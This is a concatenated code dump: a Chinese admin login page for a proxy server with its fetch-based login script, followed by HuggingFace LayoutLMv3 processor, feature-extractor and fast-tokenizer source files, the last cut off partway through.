    <title>代理服务器管理登录</title>
    <link rel="stylesheet" href="/static/css/style.css">
</head>
<body>
    <!-- Login page for the proxy-server admin panel.
         Form submission is intercepted by /static/js/login.js, which posts the
         credentials as JSON to /api/login instead of a normal form submit. -->
    <div class="login-container">
        <div class="login-box">
            <h2>代理服务器管理系统</h2>
            <!-- Populated by login.js when the login request fails -->
            <div id="error-message" class="error-message"></div>
            <form id="login-form">
                <div class="form-group">
                    <label for="username">用户名</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="form-group">
                    <label for="password">密码</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <button type="submit" class="btn-login">登录</button>
            </form>
        </div>
    </div>
    <script src="/static/js/login.js"></script>
</body>
</html> |
27182812/ChatGLM-LLaMA-chinese-insturct | 9,085 | src/transformers/models/layoutlmv3/processing_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Processor class for LayoutLMv3.
"""
import warnings
from typing import List, Optional, Union
from ...processing_utils import ProcessorMixin
from ...tokenization_utils_base import BatchEncoding, PaddingStrategy, PreTokenizedInput, TextInput, TruncationStrategy
from ...utils import TensorType
class LayoutLMv3Processor(ProcessorMixin):
    r"""
    Constructs a LayoutLMv3 processor which combines a LayoutLMv3 image processor and a LayoutLMv3 tokenizer into a
    single processor.
    [`LayoutLMv3Processor`] offers all the functionalities you need to prepare data for the model.
    It first uses [`LayoutLMv3ImageProcessor`] to resize and normalize document images, and optionally applies OCR to
    get words and normalized bounding boxes. These are then provided to [`LayoutLMv3Tokenizer`] or
    [`LayoutLMv3TokenizerFast`], which turns the words and bounding boxes into token-level `input_ids`,
    `attention_mask`, `token_type_ids`, `bbox`. Optionally, one can provide integer `word_labels`, which are turned
    into token-level `labels` for token classification tasks (such as FUNSD, CORD).
    Args:
        image_processor (`LayoutLMv3ImageProcessor`):
            An instance of [`LayoutLMv3ImageProcessor`]. The image processor is a required input.
        tokenizer (`LayoutLMv3Tokenizer` or `LayoutLMv3TokenizerFast`):
            An instance of [`LayoutLMv3Tokenizer`] or [`LayoutLMv3TokenizerFast`]. The tokenizer is a required input.
    """
    attributes = ["image_processor", "tokenizer"]
    image_processor_class = "LayoutLMv3ImageProcessor"
    tokenizer_class = ("LayoutLMv3Tokenizer", "LayoutLMv3TokenizerFast")
    def __init__(self, image_processor=None, tokenizer=None, **kwargs):
        # Accept the legacy `feature_extractor` keyword as an alias for
        # `image_processor`, emitting a deprecation warning.
        if "feature_extractor" in kwargs:
            warnings.warn(
                "The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
                " instead.",
                FutureWarning,
            )
            feature_extractor = kwargs.pop("feature_extractor")
        image_processor = image_processor if image_processor is not None else feature_extractor
        if image_processor is None:
            raise ValueError("You need to specify an `image_processor`.")
        if tokenizer is None:
            raise ValueError("You need to specify a `tokenizer`.")
        super().__init__(image_processor, tokenizer)
    def __call__(
        self,
        images,
        text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]] = None,
        text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
        boxes: Union[List[List[int]], List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        return_tensors: Optional[Union[str, TensorType]] = None,
        **kwargs,
    ) -> BatchEncoding:
        """
        This method first forwards the `images` argument to [`~LayoutLMv3ImageProcessor.__call__`]. In case
        [`LayoutLMv3ImageProcessor`] was initialized with `apply_ocr` set to `True`, it passes the obtained words and
        bounding boxes along with the additional arguments to [`~LayoutLMv3Tokenizer.__call__`] and returns the output,
        together with resized and normalized `pixel_values`. In case [`LayoutLMv3ImageProcessor`] was initialized with
        `apply_ocr` set to `False`, it passes the words (`text`/`text_pair`) and `boxes` specified by the user along
        with the additional arguments to [`~LayoutLMv3Tokenizer.__call__`] and returns the output, together with
        resized and normalized `pixel_values`.
        Please refer to the docstring of the above two methods for more information.
        """
        # verify input: user-supplied boxes/labels conflict with OCR-produced ones
        if self.image_processor.apply_ocr and (boxes is not None):
            raise ValueError(
                "You cannot provide bounding boxes if you initialized the image processor with apply_ocr set to True."
            )
        if self.image_processor.apply_ocr and (word_labels is not None):
            raise ValueError(
                "You cannot provide word labels if you initialized the image processor with apply_ocr set to True."
            )
        # first, apply the image processor (may also run OCR, producing "words"/"boxes")
        features = self.image_processor(images=images, return_tensors=return_tensors)
        # second, apply the tokenizer
        # When OCR ran and only `text` was given, `text` is treated as the question
        # and the OCR words become the second sequence.
        if text is not None and self.image_processor.apply_ocr and text_pair is None:
            if isinstance(text, str):
                text = [text]  # add batch dimension (as the image processor always adds a batch dimension)
            text_pair = features["words"]
        encoded_inputs = self.tokenizer(
            text=text if text is not None else features["words"],
            text_pair=text_pair if text_pair is not None else None,
            boxes=boxes if boxes is not None else features["boxes"],
            word_labels=word_labels,
            add_special_tokens=add_special_tokens,
            padding=padding,
            truncation=truncation,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_token_type_ids=return_token_type_ids,
            return_attention_mask=return_attention_mask,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_offsets_mapping=return_offsets_mapping,
            return_length=return_length,
            verbose=verbose,
            return_tensors=return_tensors,
            **kwargs,
        )
        # add pixel values (duplicated per overflowing sample if truncation overflowed)
        images = features.pop("pixel_values")
        if return_overflowing_tokens is True:
            images = self.get_overflowing_images(images, encoded_inputs["overflow_to_sample_mapping"])
        encoded_inputs["pixel_values"] = images
        return encoded_inputs
    def get_overflowing_images(self, images, overflow_to_sample_mapping):
        # in case there's an overflow, ensure each `input_ids` sample is mapped to its corresponding image
        images_with_overflow = []
        for sample_idx in overflow_to_sample_mapping:
            images_with_overflow.append(images[sample_idx])
        if len(images_with_overflow) != len(overflow_to_sample_mapping):
            raise ValueError(
                "Expected length of images to be the same as the length of `overflow_to_sample_mapping`, but got"
                f" {len(images_with_overflow)} and {len(overflow_to_sample_mapping)}"
            )
        return images_with_overflow
    def batch_decode(self, *args, **kwargs):
        """
        This method forwards all its arguments to PreTrainedTokenizer's [`~PreTrainedTokenizer.batch_decode`]. Please
        refer to the docstring of this method for more information.
        """
        return self.tokenizer.batch_decode(*args, **kwargs)
    def decode(self, *args, **kwargs):
        """
        This method forwards all its arguments to PreTrainedTokenizer's [`~PreTrainedTokenizer.decode`]. Please refer
        to the docstring of this method for more information.
        """
        return self.tokenizer.decode(*args, **kwargs)
    @property
    def model_input_names(self):
        # Names of the tensors the model expects from this processor's output.
        return ["input_ids", "bbox", "attention_mask", "pixel_values"]
    @property
    def feature_extractor_class(self):
        # Deprecated alias for `image_processor_class`.
        warnings.warn(
            "`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
            FutureWarning,
        )
        return self.image_processor_class
    @property
    def feature_extractor(self):
        # Deprecated alias for `image_processor`.
        warnings.warn(
            "`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
            FutureWarning,
        )
        return self.image_processor
|
27182812/ChatGLM-LLaMA-chinese-insturct | 1,195 | src/transformers/models/layoutlmv3/feature_extraction_layoutlmv3.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Feature extractor class for LayoutLMv3.
"""
import warnings
from ...utils import logging
from .image_processing_layoutlmv3 import LayoutLMv3ImageProcessor
logger = logging.get_logger(__name__)
class LayoutLMv3FeatureExtractor(LayoutLMv3ImageProcessor):
    """Deprecated alias of [`LayoutLMv3ImageProcessor`], kept for backward compatibility."""

    def __init__(self, *args, **kwargs) -> None:
        # Emit a deprecation notice on every instantiation, then delegate
        # everything to the image processor implementation.
        deprecation_message = (
            "The class LayoutLMv3FeatureExtractor is deprecated and will be removed in version 5 of Transformers."
            " Please use LayoutLMv3ImageProcessor instead."
        )
        warnings.warn(deprecation_message, FutureWarning)
        super().__init__(*args, **kwargs)
|
2833844911/cyTlsXhr | 1,431 | static/js/login.js | document.addEventListener('DOMContentLoaded', function() {
    const loginForm = document.getElementById('login-form');
    const errorMessage = document.getElementById('error-message');
    // Already logged in (token present in localStorage): skip the form entirely.
    if (localStorage.getItem('token')) {
        window.location.href = '/dashboard';
        return;
    }
    // Handle login form submission via fetch instead of a normal form POST.
    loginForm.addEventListener('submit', function(e) {
        e.preventDefault();
        const username = document.getElementById('username').value;
        const password = document.getElementById('password').value;
        // Send the login request as JSON to the backend.
        fetch('/api/login', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                username: username,
                password: password
            })
        })
        .then(response => response.json())
        .then(data => {
            if (data.success) {
                // Persist the auth token for subsequent requests.
                localStorage.setItem('token', data.token);
                // Redirect to the dashboard.
                window.location.href = '/dashboard';
            } else {
                // Show the server-provided error, or a generic fallback.
                errorMessage.textContent = data.message || '登录失败,请检查用户名和密码';
            }
        })
        .catch(error => {
            // Network failure or non-JSON response ends up here.
            console.error('登录请求失败:', error);
            errorMessage.textContent = '登录请求失败,请稍后重试';
        });
    });
}); |
27182812/ChatGLM-LLaMA-chinese-insturct | 40,182 | src/transformers/models/layoutlmv3/tokenization_layoutlmv3_fast.py | # coding=utf-8
# Copyright 2022 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fast tokenization class for LayoutLMv3. It overwrites 2 methods of the slow tokenizer class, namely _batch_encode_plus
and _encode_plus, in which the Rust tokenizer is used.
"""
import json
from typing import Dict, List, Optional, Tuple, Union
from tokenizers import pre_tokenizers, processors
from ...tokenization_utils_base import (
BatchEncoding,
EncodedInput,
PaddingStrategy,
PreTokenizedInput,
TensorType,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import add_end_docstrings, logging
from .tokenization_layoutlmv3 import (
LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING,
LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING,
LayoutLMv3Tokenizer,
)
# Module-level logger, scoped to this file's module name.
logger = logging.get_logger(__name__)
# File names under which the tokenizer's vocabulary artifacts are saved/loaded.
VOCAB_FILES_NAMES = {"vocab_file": "vocab.json", "merges_file": "merges.txt", "tokenizer_file": "tokenizer.json"}
# Hub URLs of the vocabulary files for the officially released checkpoints.
PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/vocab.json",
        "microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/vocab.json",
    },
    "merges_file": {
        "microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/merges.txt",
        "microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/merges.txt",
    },
}
# Maximum sequence lengths (positional embedding sizes) of the released checkpoints.
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "microsoft/layoutlmv3-base": 512,
    "microsoft/layoutlmv3-large": 512,
}
class LayoutLMv3TokenizerFast(PreTrainedTokenizerFast):
r"""
Construct a "fast" LayoutLMv3 tokenizer (backed by HuggingFace's *tokenizers* library). Based on BPE.
This tokenizer inherits from [`PreTrainedTokenizerFast`] which contains most of the main methods. Users should
refer to this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
trim_offsets (`bool`, *optional*, defaults to `True`):
Whether the post processing step should trim offsets to avoid including whitespaces.
cls_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [SEP] token.
pad_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (`int`, *optional*, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the `ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (`bool`, *optional*, defaults to `True`):
Whether or not to only label the first subword, in case word labels are provided.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
slow_tokenizer_class = LayoutLMv3Tokenizer
    def __init__(
        self,
        vocab_file=None,
        merges_file=None,
        tokenizer_file=None,
        errors="replace",
        bos_token="<s>",
        eos_token="</s>",
        sep_token="</s>",
        cls_token="<s>",
        unk_token="<unk>",
        pad_token="<pad>",
        mask_token="<mask>",
        add_prefix_space=True,
        trim_offsets=True,
        # NOTE(review): mutable list defaults below are shared across calls; they
        # appear to be read-only here, but confirm nothing mutates them in place.
        cls_token_box=[0, 0, 0, 0],
        sep_token_box=[0, 0, 0, 0],
        pad_token_box=[0, 0, 0, 0],
        pad_token_label=-100,
        only_label_first_subword=True,
        **kwargs,
    ):
        """Build the fast tokenizer and synchronize the backend (Rust) tokenizer's
        pre-tokenizer and post-processor with the `add_prefix_space` / `trim_offsets`
        settings requested by the caller."""
        super().__init__(
            vocab_file,
            merges_file,
            tokenizer_file=tokenizer_file,
            errors=errors,
            bos_token=bos_token,
            eos_token=eos_token,
            sep_token=sep_token,
            cls_token=cls_token,
            unk_token=unk_token,
            pad_token=pad_token,
            mask_token=mask_token,
            add_prefix_space=add_prefix_space,
            trim_offsets=trim_offsets,
            cls_token_box=cls_token_box,
            sep_token_box=sep_token_box,
            pad_token_box=pad_token_box,
            pad_token_label=pad_token_label,
            only_label_first_subword=only_label_first_subword,
            **kwargs,
        )
        # The serialized tokenizer may have been saved with a different
        # `add_prefix_space`; rebuild the pre-tokenizer if it disagrees.
        pre_tok_state = json.loads(self.backend_tokenizer.pre_tokenizer.__getstate__())
        if pre_tok_state.get("add_prefix_space", add_prefix_space) != add_prefix_space:
            pre_tok_class = getattr(pre_tokenizers, pre_tok_state.pop("type"))
            pre_tok_state["add_prefix_space"] = add_prefix_space
            self.backend_tokenizer.pre_tokenizer = pre_tok_class(**pre_tok_state)
        self.add_prefix_space = add_prefix_space
        # Do the same synchronization for the post-processor, which also carries
        # `add_prefix_space` and `trim_offsets` in its serialized state.
        tokenizer_component = "post_processor"
        tokenizer_component_instance = getattr(self.backend_tokenizer, tokenizer_component, None)
        if tokenizer_component_instance:
            state = json.loads(tokenizer_component_instance.__getstate__())
            # The lists 'sep' and 'cls' must be cased in tuples for the object `post_processor_class`
            if "sep" in state:
                state["sep"] = tuple(state["sep"])
            if "cls" in state:
                state["cls"] = tuple(state["cls"])
            changes_to_apply = False
            if state.get("add_prefix_space", add_prefix_space) != add_prefix_space:
                state["add_prefix_space"] = add_prefix_space
                changes_to_apply = True
            if state.get("trim_offsets", trim_offsets) != trim_offsets:
                state["trim_offsets"] = trim_offsets
                changes_to_apply = True
            # Only rebuild the post-processor when something actually changed.
            if changes_to_apply:
                component_class = getattr(processors, state.pop("type"))
                new_value = component_class(**state)
                setattr(self.backend_tokenizer, tokenizer_component, new_value)
        # additional properties (bounding boxes / labels for special and padding tokens)
        self.cls_token_box = cls_token_box
        self.sep_token_box = sep_token_box
        self.pad_token_box = pad_token_box
        self.pad_token_label = pad_token_label
        self.only_label_first_subword = only_label_first_subword
    @add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.__call__
    def __call__(
        self,
        text: Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]],
        text_pair: Optional[Union[PreTokenizedInput, List[PreTokenizedInput]]] = None,
        boxes: Union[List[List[int]], List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs,
    ) -> BatchEncoding:
        """
        Main method to tokenize and prepare for the model one or several sequence(s) or one or several pair(s) of
        sequences with word-level normalized bounding boxes and optional labels.

        Depending on the inputs, this dispatches to `batch_encode_plus` (batched input) or `encode_plus` (single
        example). `boxes` is mandatory; every word must have exactly one bounding box.

        Args:
            text (`str`, `List[str]`, `List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence can be a string, a list of strings
                (words of a single example or questions of a batch of examples) or a list of list of strings (batch of
                words).
            text_pair (`List[str]`, `List[List[str]]`):
                The sequence or batch of sequences to be encoded. Each sequence should be a list of strings
                (pretokenized string).
            boxes (`List[List[int]]`, `List[List[List[int]]]`):
                Word-level bounding boxes. Each bounding box should be normalized to be on a 0-1000 scale.
            word_labels (`List[int]`, `List[List[int]]`, *optional*):
                Word-level integer labels (for token classification tasks such as FUNSD, CORD).

        Returns:
            `BatchEncoding`: The encoded inputs, including `bbox` (and `labels` when `word_labels` is given).
        """
        # Input type checking for clearer error
        def _is_valid_text_input(t):
            # Accepts: str | list/tuple of str | list/tuple of list/tuple of str (possibly empty at any level).
            if isinstance(t, str):
                # Strings are fine
                return True
            elif isinstance(t, (list, tuple)):
                # List are fine as long as they are...
                if len(t) == 0:
                    # ... empty
                    return True
                elif isinstance(t[0], str):
                    # ... list of strings
                    return True
                elif isinstance(t[0], (list, tuple)):
                    # ... list with an empty list or with a list of strings
                    return len(t[0]) == 0 or isinstance(t[0][0], str)
                else:
                    return False
            else:
                return False
        if text_pair is not None:
            # in case text + text_pair are provided, text = questions, text_pair = words
            if not _is_valid_text_input(text):
                raise ValueError("text input must of type `str` (single example) or `List[str]` (batch of examples). ")
            if not isinstance(text_pair, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        else:
            # in case only text is provided => must be words
            if not isinstance(text, (list, tuple)):
                raise ValueError(
                    "Words must be of type `List[str]` (single pretokenized example), "
                    "or `List[List[str]]` (batch of pretokenized examples)."
                )
        # With a text_pair, a list/tuple `text` means a batch of questions; without one, batched input means a
        # non-empty list whose first element is itself a list/tuple of words.
        if text_pair is not None:
            is_batched = isinstance(text, (list, tuple))
        else:
            is_batched = isinstance(text, (list, tuple)) and text and isinstance(text[0], (list, tuple))
        # The boxes always align with the *words*: `text` in the words-only case, `text_pair` in the QA case.
        words = text if text_pair is None else text_pair
        if boxes is None:
            raise ValueError("You must provide corresponding bounding boxes")
        if is_batched:
            if len(words) != len(boxes):
                raise ValueError("You must provide words and boxes for an equal amount of examples")
            for words_example, boxes_example in zip(words, boxes):
                if len(words_example) != len(boxes_example):
                    raise ValueError("You must provide as many words as there are bounding boxes")
        else:
            if len(words) != len(boxes):
                raise ValueError("You must provide as many words as there are bounding boxes")
        if is_batched:
            if text_pair is not None and len(text) != len(text_pair):
                raise ValueError(
                    f"batch length of `text`: {len(text)} does not match batch length of `text_pair`:"
                    f" {len(text_pair)}."
                )
            batch_text_or_text_pairs = list(zip(text, text_pair)) if text_pair is not None else text
            is_pair = bool(text_pair is not None)
            return self.batch_encode_plus(
                batch_text_or_text_pairs=batch_text_or_text_pairs,
                is_pair=is_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
        else:
            return self.encode_plus(
                text=text,
                text_pair=text_pair,
                boxes=boxes,
                word_labels=word_labels,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_tensors=return_tensors,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                **kwargs,
            )
    @add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.batch_encode_plus
    def batch_encode_plus(
        self,
        batch_text_or_text_pairs: Union[
            List[TextInput],
            List[TextInputPair],
            List[PreTokenizedInput],
        ],
        is_pair: bool = None,
        boxes: Optional[List[List[List[int]]]] = None,
        word_labels: Optional[Union[List[int], List[List[int]]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs,
    ) -> BatchEncoding:
        """
        Tokenize and prepare for the model a batch of sequences (words) or a batch of (question, words) pairs,
        together with word-level bounding boxes and optional word labels.

        Resolves the user-facing `padding`/`truncation` arguments into concrete strategies (including
        backward-compatible handling of deprecated kwargs) and delegates the actual encoding to
        `_batch_encode_plus`.
        """
        # Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
        padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
            padding=padding,
            truncation=truncation,
            max_length=max_length,
            pad_to_multiple_of=pad_to_multiple_of,
            verbose=verbose,
            **kwargs,
        )
        return self._batch_encode_plus(
            batch_text_or_text_pairs=batch_text_or_text_pairs,
            is_pair=is_pair,
            boxes=boxes,
            word_labels=word_labels,
            add_special_tokens=add_special_tokens,
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_tensors=return_tensors,
            return_token_type_ids=return_token_type_ids,
            return_attention_mask=return_attention_mask,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_offsets_mapping=return_offsets_mapping,
            return_length=return_length,
            verbose=verbose,
            **kwargs,
        )
# Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.tokenize
def tokenize(self, text: str, pair: Optional[str] = None, add_special_tokens: bool = False, **kwargs) -> List[str]:
batched_input = [(text, pair)] if pair else [text]
encodings = self._tokenizer.encode_batch(
batched_input, add_special_tokens=add_special_tokens, is_pretokenized=False, **kwargs
)
return encodings[0].tokens
    @add_end_docstrings(LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING, LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING)
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast.encode_plus
    def encode_plus(
        self,
        text: Union[TextInput, PreTokenizedInput],
        text_pair: Optional[PreTokenizedInput] = None,
        boxes: Optional[List[List[int]]] = None,
        word_labels: Optional[List[int]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = None,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        **kwargs,
    ) -> BatchEncoding:
        """
        Tokenize and prepare for the model a sequence or a pair of sequences. .. warning:: This method is deprecated,
        `__call__` should be used instead.

        Resolves the padding/truncation strategies and delegates to `_encode_plus`.

        Args:
            text (`str`, `List[str]`, `List[List[str]]`):
                The first sequence to be encoded. This can be a string, a list of strings or a list of list of strings.
            text_pair (`List[str]` or `List[int]`, *optional*):
                Optional second sequence to be encoded. This can be a list of strings (words of a single example) or a
                list of list of strings (words of a batch of examples).
        """
        # Backward compatibility for 'truncation_strategy', 'pad_to_max_length'
        padding_strategy, truncation_strategy, max_length, kwargs = self._get_padding_truncation_strategies(
            padding=padding,
            truncation=truncation,
            max_length=max_length,
            pad_to_multiple_of=pad_to_multiple_of,
            verbose=verbose,
            **kwargs,
        )
        return self._encode_plus(
            text=text,
            boxes=boxes,
            text_pair=text_pair,
            word_labels=word_labels,
            add_special_tokens=add_special_tokens,
            padding_strategy=padding_strategy,
            truncation_strategy=truncation_strategy,
            max_length=max_length,
            stride=stride,
            pad_to_multiple_of=pad_to_multiple_of,
            return_tensors=return_tensors,
            return_token_type_ids=return_token_type_ids,
            return_attention_mask=return_attention_mask,
            return_overflowing_tokens=return_overflowing_tokens,
            return_special_tokens_mask=return_special_tokens_mask,
            return_offsets_mapping=return_offsets_mapping,
            return_length=return_length,
            verbose=verbose,
            **kwargs,
        )
    # Copied from transformers.models.layoutlmv2.tokenization_layoutlmv2_fast.LayoutLMv2TokenizerFast._batch_encode_plus with LayoutLMv2->LayoutLMv3
    def _batch_encode_plus(
        self,
        batch_text_or_text_pairs: Union[
            List[TextInput],
            List[TextInputPair],
            List[PreTokenizedInput],
        ],
        is_pair: bool = None,
        boxes: Optional[List[List[List[int]]]] = None,
        word_labels: Optional[List[List[int]]] = None,
        add_special_tokens: bool = True,
        padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
        truncation_strategy: TruncationStrategy = TruncationStrategy.DO_NOT_TRUNCATE,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_tensors: Optional[str] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
